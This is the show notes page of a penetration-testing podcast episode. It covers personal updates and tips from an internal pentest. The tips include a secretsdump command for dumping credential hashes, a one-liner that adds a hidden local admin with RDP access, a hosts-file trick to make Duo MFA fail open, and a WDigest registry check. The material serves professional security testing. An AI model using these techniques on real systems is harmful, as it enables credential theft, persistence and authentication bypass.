7MS #401: Tales of Internal Pentest Pwnage - Part 15
It’s episode 401 and we’re having fun, right? Some things we cover today:
-
The Webinar version of the DIY Pwnagotchi evening will be offered in Webinar format on Tuesday, March 10 at 10 a.m.
-
A quick house fire update - we’re closer to demolition now!
-
I finally got a new guitar!
Besides that, I’ve got a wonderful tale of pentest pwnage for you. Warning: this is a TBC (to be continued) episode in that I don’t even know how it will shake out. I’m honestly not sure if we’ll get DA! Here are the highlights:
-
I think in the past I might've said unauthenticated Nessus scans weren't worth much, but this test changed my mind.
-
If you can't dump local hashes with CrackMapExec, try SecretsDump!
./secretsdump.py -target-ip {IP of target machine} localhost/{username}@{target IP}
- If you're relaying
net user
commands (or just typing them from a relayed shell), this one-liner is a good way to quickly add your user to local admins and the Remote Desktop Users group:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add
-
Trying to RDP into a box protected with Duo MFA? If you can edit the
c:\windows\system32\drivers\etc\hosts
file, you might be able change the Duo authentication server fromapi-xxxxxxx.duosecurity.com
to127.0.0.1
and force authenetication to fail open! Source: Pentest Partners -
In general, keep an eye on CrackMapExec's output whenever you use the '-x' flag to run commands. If the system is "hanging" on a command for a while and then gives you NO output and just drops you back at your Kali prompt, the command might not be running at all due to something else on the system blocking your efforts.
-
To check if the
wdigest
flag is properly set on a machine, run:
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
If it returns 1
it is set.